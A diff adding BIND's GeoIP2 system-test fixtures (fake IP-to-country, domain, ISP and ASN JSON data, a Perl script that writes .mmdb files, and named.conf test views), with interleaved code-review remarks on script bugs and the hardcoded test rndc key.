@@ -0,0 +1,242 @@ +[ + { + "::10.53.0.1/128" : { + "continent" : { + "code" : "OC", + "names" : { + "en" : "Oceania" + } + }, + "country" : { + "iso_code" : "AU", + "names" : { + "en" : "Australia" + } + } + } + }, + { + "::10.53.0.2/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + } + } + }, + { + "::10.53.0.3/128" : { + "continent" : { + "code" : "EU", + "names" : { + "en" : "Europe" + } + }, + "country" : { + "iso_code" : "GB", + "names" : { + "en" : "United Kingdom" + } + } + } + }, + { + "::10.53.0.4/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "CA", + "names" : { + "en" : "Canada" + } + } + } + }, + { + "::10.53.0.5/128" : { + "continent" : { + "code" : "SA", + "names" : { + "en" : "South America" + } + }, + "country" : { + "iso_code" : "CL", + "names" : { + "en" : "Chile" + } + } + } + }, + { + "::10.53.0.6/128" : { + "continent" : { + "code" : "EU", + "names" : { + "en" : "Europe" + } + }, + "country" : { + "iso_code" : "DE", + "names" : { + "en" : "Germany" + } + } + } + }, + { + "::10.53.0.7/128" : { + "continent" : { + "code" : "AF", + "names" : { + "en" : "Africa" + } + }, + "country" : { + "iso_code" : "EH", + "names" : { + "en" : "Western Sahara" + } + } + } + }, + { + "::192.0.2.0/120" : { + "continent" : { + "code" : "O1", + "names" : { + "en" : "Other" + } + }, + "country" : { + "iso_code" : "O1", + "names" : { + "en" : "Other" + } + } + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "continent" : { + "code" : "OC", + "names" : { + "en" : "Oceania" + } + }, + "country" : { + "iso_code" : "AU", + "names" : { + "en" : "Australia" + } + } + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + } + } 
+ }, + { + "fd92:7065:b8e:ffff::3/128" : { + "continent" : { + "code" : "EU", + "names" : { + "en" : "Europe" + } + }, + "country" : { + "iso_code" : "GB", + "names" : { + "en" : "United Kingdom" + } + } + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "CA", + "names" : { + "en" : "Canada" + } + } + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "continent" : { + "code" : "SA", + "names" : { + "en" : "South America" + } + }, + "country" : { + "iso_code" : "CL", + "names" : { + "en" : "Chile" + } + } + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "continent" : { + "code" : "EU", + "names" : { + "en" : "Europe" + } + }, + "country" : { + "iso_code" : "DE", + "names" : { + "en" : "Germany" + } + } + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "continent" : { + "code" : "AF", + "names" : { + "en" : "Africa" + } + }, + "country" : { + "iso_code" : "EH", + "names" : { + "en" : "Western Sahara" + } + } + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoIP2-Country.mmdb b/bin/tests/system/geoip2/data/GeoIP2-Country.mmdb Binary files differnew file mode 100644 index 0000000..7771dc7 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-Country.mmdb diff --git a/bin/tests/system/geoip2/data/GeoIP2-Domain.json b/bin/tests/system/geoip2/data/GeoIP2-Domain.json new file mode 100644 index 0000000..fb8e914 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-Domain.json 
@@ -0,0 +1,72 @@ +[ + { + "::10.53.0.1/128" : { + "domain" : "one.de" + } + }, + { + "::10.53.0.2/128" : { + "domain" : "two.com" + } + }, + { + "::10.53.0.3/128" : { + "domain" : "three.com" + } + }, + { + "::10.53.0.4/128" : { + "domain" : "four.edu" + } + }, + { + "::10.53.0.5/128" : { + "domain" : "five.es" + } + }, + { + "::10.53.0.6/128" : { + "domain" : "six.it" + } + }, + { + "::10.53.0.7/128" : { + "domain" : "seven.org" + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "domain" : "one.de" + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "domain" : "two.com" + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "domain" : "three.com" + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "domain" : "four.edu" + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "domain" : "five.es" + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "domain" : "six.it" + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "domain" : "seven.org" + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoIP2-Domain.mmdb b/bin/tests/system/geoip2/data/GeoIP2-Domain.mmdb Binary files differnew file mode 100644 index 0000000..fe93dec --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-Domain.mmdb diff --git a/bin/tests/system/geoip2/data/GeoIP2-ISP.json b/bin/tests/system/geoip2/data/GeoIP2-ISP.json new file mode 100644 index 0000000..c6b0a5d --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-ISP.json 
@@ -0,0 +1,86 @@ +[ + { + "::10.53.0.1/128" : { + "isp" : "One Systems, Inc.", + "organization" : "One Systems, Inc." + } + }, + { + "::10.53.0.2/128" : { + "isp" : "Two Technology Ltd.", + "organization" : "Two Technology Ltd." + } + }, + { + "::10.53.0.3/128" : { + "isp" : "Three Network Labs", + "organization" : "Three Network Labs" + } + }, + { + "::10.53.0.4/128" : { + "isp" : "Four University", + "organization" : "Four University" + } + }, + { + "::10.53.0.5/128" : { + "isp" : "Five Telecom", + "organization" : "Five Telecom" + } + }, + { + "::10.53.0.6/128" : { + "isp" : "Six Company", + "organization" : "Six Company" + } + }, + { + "::10.53.0.7/128" : { + "isp" : "Seven Communications", + "organization" : "Seven Communications" + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "isp" : "One Systems, Inc.", + "organization" : "One Systems, Inc." + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "isp" : "Two Technology Ltd.", + "organization" : "Two Technology Ltd." + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "isp" : "Three Network Labs", + "organization" : "Three Network Labs" + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "isp" : "Four University", + "organization" : "Four University" + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "isp" : "Five Telecom", + "organization" : "Five Telecom" + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "isp" : "Six Company", + "organization" : "Six Company" + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "isp" : "Seven Communications", + "organization" : "Seven Communications" + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoIP2-ISP.mmdb b/bin/tests/system/geoip2/data/GeoIP2-ISP.mmdb Binary files differnew file mode 100644 index 0000000..73f0718 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-ISP.mmdb diff --git a/bin/tests/system/geoip2/data/GeoLite2-ASN.json b/bin/tests/system/geoip2/data/GeoLite2-ASN.json new file mode 100644 index 0000000..8fad0ce --- /dev/null 
+++ b/bin/tests/system/geoip2/data/GeoLite2-ASN.json @@ -0,0 +1,86 @@ +[ + { + "::10.53.0.1/128" : { + "autonomous_system_number" : 100001, + "autonomous_system_organization" : "One Systems, Inc." + } + }, + { + "::10.53.0.2/128" : { + "autonomous_system_number" : 100002, + "autonomous_system_organization" : "Two Technology Ltd." + } + }, + { + "::10.53.0.3/128" : { + "autonomous_system_number" : 100003, + "autonomous_system_organization" : "Three Network Labs" + } + }, + { + "::10.53.0.4/128" : { + "autonomous_system_number" : 100004, + "autonomous_system_organization" : "Four University" + } + }, + { + "::10.53.0.5/128" : { + "autonomous_system_number" : 100005, + "autonomous_system_organization" : "Five Telecom" + } + }, + { + "::10.53.0.6/128" : { + "autonomous_system_number" : 100006, + "autonomous_system_organization" : "Six Company" + } + }, + { + "::10.53.0.7/128" : { + "autonomous_system_number" : 100007, + "autonomous_system_organization" : "Seven Communications" + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "autonomous_system_number" : 100001, + "autonomous_system_organization" : "One Systems, Inc." + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "autonomous_system_number" : 100002, + "autonomous_system_organization" : "Two Technology Ltd." + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "autonomous_system_number" : 100003, + "autonomous_system_organization" : "Three Network Labs" + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "autonomous_system_number" : 100004, + "autonomous_system_organization" : "Four University" + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "autonomous_system_number" : 100005, + "autonomous_system_organization" : "Five Telecom" + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "autonomous_system_number" : 100006, + "autonomous_system_organization" : "Six Company" + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "autonomous_system_number" : 100007, + "autonomous_system_organization" : "Seven Communications" + } + } +] 
diff --git a/bin/tests/system/geoip2/data/GeoLite2-ASN.mmdb b/bin/tests/system/geoip2/data/GeoLite2-ASN.mmdb Binary files differnew file mode 100644 index 0000000..05260c0 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoLite2-ASN.mmdb diff --git a/bin/tests/system/geoip2/data/README.md b/bin/tests/system/geoip2/data/README.md new file mode 100644 index 0000000..e326843 --- /dev/null +++ b/bin/tests/system/geoip2/data/README.md @@ -0,0 +1,23 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +##### Test MMDB databases + +This directory contains test versions of the GeoIP2/GeoLite2 CIty, +Country, Domain, ISP, and ASN databases. The `.mmdb` files are built +from the corresponding `.json` source files; to regenerate them, modify +the source files and run `perl write-test-data.pl`. + +This script is adapted from one in +[https://github.com/maxmind/MaxMind-DB](https://github.com/maxmind/MaxMind-DB). +It depends on the MaxMind:DB:Writer module, which can be found in +CPAN or at +[https://github.com/maxmind/MaxMind-DB-Writer-perl](https://github.com/maxmind/MaxMind-DB-Writer-perl) . diff --git a/bin/tests/system/geoip2/data/write-test-data.pl b/bin/tests/system/geoip2/data/write-test-data.pl new file mode 100755 index 0000000..d12a014 --- /dev/null +++ b/bin/tests/system/geoip2/data/write-test-data.pl 
@@ -0,0 +1,194 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; +use autodie; +use utf8; + +use Carp qw( croak ); +use Cwd qw( abs_path ); +use File::Basename qw( dirname ); +use File::Slurper qw( read_binary write_binary ); +use Cpanel::JSON::XS qw( decode_json ); +use Math::Int128 qw( MAX_UINT128 string_to_uint128 uint128 ); +use MaxMind::DB::Writer::Serializer 0.100004; +use MaxMind::DB::Writer::Tree 0.100004; +use MaxMind::DB::Writer::Util qw( key_for_data ); +use Net::Works::Network; +use Test::MaxMind::DB::Common::Util qw( standard_test_metadata ); + +my $Dir = dirname( abs_path($0) ); + +sub main { + write_geoip2_dbs(); +} + +sub write_geoip2_dbs { + _write_geoip2_db( @{$_}[ 0, 1 ], 'Test' ) + for ( + ['GeoIP2-City'], + ['GeoIP2-Country'], + ['GeoIP2-Domain'], + ['GeoIP2-ISP'], + ['GeoLite2-ASN'], + ); +} + +sub _universal_map_key_type_callback { + my $map = { + + # languages + de => 'utf8_string', + en => 'utf8_string', + es => 'utf8_string', + fr => 'utf8_string', + ja => 'utf8_string', + 'pt-BR' => 'utf8_string', + ru => 'utf8_string', + 'zh-CN' => 'utf8_string', + + # production + accuracy_radius => 'uint16', + autonomous_system_number => 'uint32', + autonomous_system_organization => 'utf8_string', + average_income => 'uint32', + city => 'map', + code => 'utf8_string', + confidence => 'uint16', + connection_type => 'utf8_string', + continent => 'map', + country => 'map', + domain => 'utf8_string', + geoname_id => 'uint32', + ipv4_24 => 'uint32', + ipv4_32 => 'uint32', + ipv6_32 => 'uint32', + ipv6_48 => 'uint32', + ipv6_64 => 
'uint32', + is_anonymous => 'boolean', + is_anonymous_proxy => 'boolean', + is_anonymous_vpn => 'boolean', + is_hosting_provider => 'boolean', + is_in_european_union => 'boolean', + is_legitimate_proxy => 'boolean', + is_public_proxy => 'boolean', + is_satellite_provider => 'boolean', + is_tor_exit_node => 'boolean', + iso_code => 'utf8_string', + isp => 'utf8_string', + latitude => 'double', + location => 'map', + longitude => 'double', + metro_code => 'uint16', + names => 'map', + organization => 'utf8_string', + population_density => 'uint32', + postal => 'map', + registered_country => 'map', + represented_country => 'map', + subdivisions => [ 'array', 'map' ], + time_zone => 'utf8_string', + traits => 'map', + traits => 'map', + type => 'utf8_string', + user_type => 'utf8_string', + + # for testing only + foo => 'utf8_string', + bar => 'utf8_string', + buzz => 'utf8_string', + our_value => 'utf8_string', + }; + + my $callback = sub { + my $key = shift; + + return $map->{$key} || die <<"ERROR"; +Unknown tree key '$key'. + +The universal_map_key_type_callback doesn't know what type to use for the passed +key. If you are adding a new key that will be used in a frozen tree / mmdb then +you should update the mapping in both our internal code and here. +ERROR + }; + + return $callback; +} + +sub _write_geoip2_db { + my $type = shift; + my $populate_all_networks_with_data = shift; + my $description = shift; + + my $writer = MaxMind::DB::Writer::Tree->new( + ip_version => 6, + record_size => 28, + ip_version => 6, + database_type => $type, + languages => [ 'en', $type eq 'GeoIP2-City' ? ('zh') : () ], + description => { + en => ( $type =~ s/-/ /gr ) + . " $description Database (fake GeoIP2 data, for example purposes only)", + $type eq 'GeoIP2-City' ? 
( zh => 'å°åž‹æ•°æ®åº“' ) : (), + }, + alias_ipv6_to_ipv4 => 1, + map_key_type_callback => _universal_map_key_type_callback(), + remove_reserved_networks => 0, + ); + + _populate_all_networks( $writer, $populate_all_networks_with_data ) + if $populate_all_networks_with_data; + + my $value = shift; + my $nodes + = decode_json( read_binary("$Dir/$type.json") ); + + for my $node (@$nodes) { + for my $network ( keys %$node ) { + $writer->insert_network( + Net::Works::Network->new_from_string( string => $network ), + $node->{$network} + ); + } + } + + open my $output_fh, '>', "$Dir/$type.mmdb"; + $writer->write_tree($output_fh); + close $output_fh; + + return; +} + +sub _populate_all_networks { + my $writer = shift; + my $data = shift; + + my $max_uint128 = uint128(0) - 1; + my @networks = Net::Works::Network->range_as_subnets( + Net::Works::Address->new_from_integer( + integer => 0, + version => 6, + ), + Net::Works::Address->new_from_integer( + integer => $max_uint128, + version => 6, + ), + ); + + for my $network (@networks) { + $writer->insert_network( $network => $data ); + } +} + +main(); diff --git a/bin/tests/system/geoip2/ns2/example.db.in b/bin/tests/system/geoip2/ns2/example.db.in new file mode 100644 index 0000000..fa3874c --- /dev/null +++ b/bin/tests/system/geoip2/ns2/example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 
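Review bot: `open my $output_fh, '>', "$Dir/$type.mmdb";` in `_write_geoip2_db` writes a binary database through a text-mode handle; `open my $output_fh, '>:raw', "$Dir/$type.mmdb";` keeps the output byte-exact on platforms that translate line endings. The same function carries leftovers from the script it was adapted from: `ip_version => 6` is passed twice to `MaxMind::DB::Writer::Tree->new`, and `my $value = shift;` is never read. Every entry in `write_geoip2_dbs` is a one-element array, so the `@{$_}[ 0, 1 ]` slice always passes undef as the second argument and `_populate_all_networks` is never reached. The generated `.mmdb` files are committed as opaque binaries next to their `.json` sources, so a test step that regenerates them and compares the dumped contents would let a reviewer confirm the two stay in sync. A byte-for-byte comparison may not work if the writer embeds a build timestamp.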
diff --git a/bin/tests/system/geoip2/ns2/named1.conf.in b/bin/tests/system/geoip2/ns2/named1.conf.in
new file mode 100644
index 0000000..8c5784a
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named1.conf.in
@@ -0,0 +1,108 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip db country country AU; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip db country country US; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip db country country GB; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip db country country CA; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip db country country CL; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip db country country DE; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip db country country EH; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view other { + match-clients { geoip db country country O1; }; + zone "example" { + type primary; + file "exampleother.db"; + }; +}; + +view none { + match-clients { 
any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named10.conf.in b/bin/tests/system/geoip2/ns2/named10.conf.in new file mode 100644 index 0000000..da3f9cd --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named10.conf.in 
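Review bot: The `controls` block accepts rndc connections from any source (`allow { any; }`) and authenticates them with the literal secret `1234abcd8765`, which is short and repeated unchanged in every other config visible in this set (named10, named11, named12 and named2 through named8). That is workable for a harness bound to 10.53.0.2, but nothing in the file says so, and test configs tend to get copied as templates. I would add a comment above the key, `// Test-only rndc key: fixed and publicly known; never reuse outside the system-test network.` If the harness always connects from one fixed address (not visible here), the `allow` list could name it instead of `any`.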
@@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip asnum 100001; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip asnum 100002; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip asnum 100003; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip asnum 100004; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip asnum 100005; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip asnum 100006; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip asnum 100007; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; 
diff --git a/bin/tests/system/geoip2/ns2/named11.conf.in b/bin/tests/system/geoip2/ns2/named11.conf.in
new file mode 100644
index 0000000..578a484
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named11.conf.in
@@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip domain one.de; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip domain two.com; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip domain three.com; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip domain four.edu; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip domain five.es; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip domain six.it; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip domain seven.org; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; 
diff --git a/bin/tests/system/geoip2/ns2/named12.conf.in b/bin/tests/system/geoip2/ns2/named12.conf.in
new file mode 100644
index 0000000..9c90c79
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named12.conf.in
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+acl blocking {
+ geoip db country country AU;
+};
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ dnssec-validation no;
+ geoip-directory "../data";
+ blackhole { blocking; };
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
diff --git a/bin/tests/system/geoip2/ns2/named2.conf.in b/bin/tests/system/geoip2/ns2/named2.conf.in
new file mode 100644
index 0000000..5ca5fcf
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named2.conf.in
@@ -0,0 +1,108 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 127.0.0.1; 10.53.0.2; }; + listen-on-v6 { ::1; fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +acl gAU { geoip db country country AU; }; +acl gUS { geoip db country country US; }; +acl gGB { geoip db country country GB; }; +acl gCA { geoip db country country CA; }; +acl gCL { geoip db country country CL; }; +acl gDE { geoip db country country DE; }; +acl gEH { geoip db country country EH; }; + +view one { + match-clients { gAU; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { gUS; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { gGB; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { gCA; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { gCL; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { gDE; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { gEH; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + 
match-clients { any; }; + zone "example" { + type primary; + file "examplebogus.db"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named3.conf.in b/bin/tests/system/geoip2/ns2/named3.conf.in new file mode 100644 index 0000000..295122a --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named3.conf.in 
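Review bot: This is the only config in the visible set that also listens on `127.0.0.1` and `::1`, and its catch-all `view none` loads `examplebogus.db` where the others load `example.db.in`; neither difference is explained. If the intent is that every test client must match one of the `gXX` ACLs and the catch-all must never answer, a comment on `view none` such as `// must never be selected: every test client matches a geoip ACL above` would say so. Without it a reader is likely to take the file name for a typo and the extra listeners for an accident.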
@@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip db country country Australia; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip db country country "United States"; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip db country country "United Kingdom"; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip db country country Canada; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip db country country Chile; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip db country country Germany; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip db country country "Western Sahara"; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; 
diff --git a/bin/tests/system/geoip2/ns2/named4.conf.in b/bin/tests/system/geoip2/ns2/named4.conf.in
new file mode 100644
index 0000000..efdcaeb
--- /dev/null
+++ b/bin/tests/system/geoip2/ns2/named4.conf.in
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { fd92:7065:b8e:ffff::2; };
+ recursion no;
+ dnssec-validation no;
+ geoip-directory "../data";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view one {
+ match-clients { geoip db country continent OC; };
+ zone "example" {
+ type primary;
+ file "example1.db";
+ };
+};
+
+view two {
+ match-clients { geoip db country continent NA; };
+ zone "example" {
+ type primary;
+ file "example2.db";
+ };
+};
+
+view three {
+ match-clients { geoip db country continent EU; };
+ zone "example" {
+ type primary;
+ file "example3.db";
